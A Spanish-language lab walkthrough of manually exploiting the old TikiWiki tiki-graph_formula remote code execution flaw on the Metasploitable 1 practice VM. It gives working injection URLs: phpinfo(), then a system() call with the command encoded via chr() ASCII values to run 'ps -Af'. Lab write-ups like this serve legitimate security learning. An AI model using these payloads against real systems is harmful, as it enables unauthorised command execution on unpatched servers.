La vulnerabilidad tiki-graph_formula es del año 2008, bastante vieja, se encuentra en la maquina Metasploitable 1.
En este caso, lo que vamos ha hacer es explotar la vulnerabilidad a mano, sin usar ningún modulo de explotación automática, a ver hasta donde llegamos.
Tras desplegar la maquina virtual, nos encontramos con tiki wiki instalado en la ruta:
ipdelamaquina:80/tikiwiki/
La vulnerabilidad que vamos a practicar se encuentra en:
http://example.org/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
Al acceder veremos la ejecución de la funcion de phpinfo() tal como muestra la imagen.
El proceso de explotación, es algo mas complicado ya que no podemos escribir los comandos de consola directamente en la barra de navegación y pasarlos a la funcion system, exec o passthru.
Para ello debemos inyectar código PHP exclusivamente, esta es la única forma de la que yo he conseguido explotar esta vulnerabilidad.
Consiste en abusar de la función chr y passthru.
De tal forma que si deseamos ejecutar el comando ps -Af, deberíamos primero pasar el comando usando la tabla de codigo ASCII y la función chr concatenada por cada letra del comando.
Para ello podemos usar este convertidor de texto a código ASCII
Al convertir ps -Af a código ASCII obtenemos:
112 115 32 45 65 102
Esto quiere decir que para hacer un ps -Af desde php debemos enviar mediante el navegador el siguiente código PHP:
system(chr(112).chr(115).chr(32).chr(45).chr(65).chr(102))
De tal forma que la URL queda:
http://example.org/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.system(chr(112).chr(115).chr(32).chr(45).chr(65).chr(102))&t=png&title=
Dando el siguiente resultado en el navegador:
Aprovechamos el resultado para descubrir que nuestro usuario es el www-data.
Para esta vulnerabilidad he escrito un exploit generico para ejecucion de comandos en PHP que esta disponible en: